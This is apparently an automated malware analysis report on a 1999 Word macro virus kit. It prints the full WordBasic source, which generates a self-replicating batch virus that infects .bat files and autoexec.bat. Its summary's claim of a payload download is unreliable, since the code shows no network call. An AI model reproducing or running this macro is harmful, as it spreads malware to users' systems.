MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a WordBasic macro that executes automatically upon opening (AutoOpen). The macro displays a dialog box to the user, prompting for input related to a virus name and path, and attempts to construct a batch file named 'c:\boot.bat'. This indicates a likely intent to download and execute a secondary payload or establish persistence.
Heuristics 4
-
ClamAV: Win.Tool.Macro-18 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Tool.Macro-18
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9290 bytes |
SHA-256: 46d4eea5134c81f520ad67398a73905d05428b5190db1cbe58455dbb8d063a52 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
WordBasic.MsgBox "Mafia's Shit Creation Center v1.0b" + Chr(13) + _
" " + Chr(13) + _
" (c) by XaRaBaS [DkpRJ]", "MSCC v1.0b"
WordBasic.BeginDialog 400, 150, "MSCC v1.0b (c) XaRaBaS [DkpRJ]"
WordBasic.Text 10, 10, 300, 20, "Enter virus info and click OK"
WordBasic.Text 10, 40, 100, 50, "NaMe oF ThiS ShiT:"
WordBasic.TextBox 120, 40, 120, 17, "Ident$"
WordBasic.Text 10, 70, 100, 50, "Author:"
WordBasic.TextBox 120, 70, 120, 17, "Author$"
WordBasic.Text 10, 100, 100, 50, "TyPe HeRe ThE PaTh AnD ThE NaME Of ThE ViRuS:"
WordBasic.TextBox 120, 100, 240, 17, "Name$"
WordBasic.OKButton 270, 40, 90, 20
WordBasic.CancelButton 270, 70, 90, 20
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
dlg.Ident$ = "[DkpRJ]"
dlg.Author$ = "XaRaBaS 1999 [DkpRJ]"
dlg.Name$ = "c:\boot.bat"
On Error GoTo -1: On Error GoTo Clo
WordBasic.Dialog.UserDialog dlg
WordBasic.FileNew
WordBasic.Insert "@echo off %" + dlg.Ident$ + "%" + Chr(13) + Chr(10)
WordBasic.Insert "if -%1==-@ goto " + dlg.Ident$ + "z" + Chr(13) + Chr(10)
WordBasic.Insert "echo.>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%0>>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "for %%b in (*.bat) do call " + _
dlg.Ident$ + ".bat @ %%b" + Chr(13) + Chr(10)
WordBasic.Insert "del " + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "goto " + dlg.Ident$ + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + "z [SBVM 0.02d]" + Chr(13) + Chr(10)
WordBasic.Insert "if -%2==-autoexec.bat goto " + dlg.Ident$ + _
Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%2>nul" + Chr(13) + Chr(10)
WordBasic.Insert "if errorlevel 1 type " + dlg.Ident$ + _
".bat>>%2" + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + " by " + dlg.Author$
WordBasic.FileSaveAs Name:=dlg.Name$, Format:=4
WordBasic.FileClose (2)
WordBasic.MsgBox "A NeW ViRuS WaS CreAtED!!" + Chr(13) + _
"ThAnKs FoR UsInG MaFiA's ShIt CoStRuCtIon KiT", "MSCC v1.0b"
Clo:
End Sub
' Processing file: /opt/analyzer/scan_staging/889ab833b59d48ff80c962cf2f6f2492.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoOpen - 4323 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' LineCont 0x0008 0A 00 00 00 11 00 00 00
' LitStr 0x0022 "Mafia's Shit Creation Center v1.0b"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0013 " "
' Add
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Add
' LitStr 0x001D " (c) by XaRaBaS [DkpRJ]"
' Add
' LitStr 0x000A "MSCC v1.0b"
' Ld WordBasic
' ArgsMemCall MsgBox 0x0002
' Line #3:
' LitDI2 0x0190
' LitDI2 0x0096
' LitStr 0x0020 "MSCC v1.0b (c) XaRaBaS [DkpRJ]"
' Ld WordBasic
' ArgsMemCall BeginDialog 0x0003
' Line #4:
' LitDI2 0x000A
' LitDI2 0x000A
' LitDI2 0x012C
' LitDI2 0x0014
' LitStr 0x001D "Enter virus info and click OK"
' Ld WordBasic
' ArgsMemCall Then 0x0005
' Line #5:
' LitDI2 0x000A
' LitDI2 0x0028
' LitDI2 0x0064
' LitDI2 0x0032
' LitStr 0x0012 "NaMe oF ThiS ShiT:"
' Ld WordBasic
' ArgsMemCall Then 0x0005
' Line #6:
' LitDI2 0x0078
' LitDI2 0x0028
' LitDI2 0x0078
' LitDI2 0x0011
' LitStr 0x0006 "Ident$"
' Ld WordBasic
' ArgsMemCall TextBox 0x0005
' Line #7:
' LitDI2 0x000A
' LitDI2 0x0046
' LitDI2 0x0064
' LitDI2 0x0032
' LitStr 0x0007 "Author:"
' Ld WordBasic
' ArgsMemCall Then 0x0005
' Line #8:
' LitDI2 0x0078
' LitDI2 0x0046
' LitDI2 0x0078
' LitDI2 0x0011
' LitStr 0x0007 "Author$"
' Ld WordBasic
' ArgsMemCall TextBox 0x0005
' Lin
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.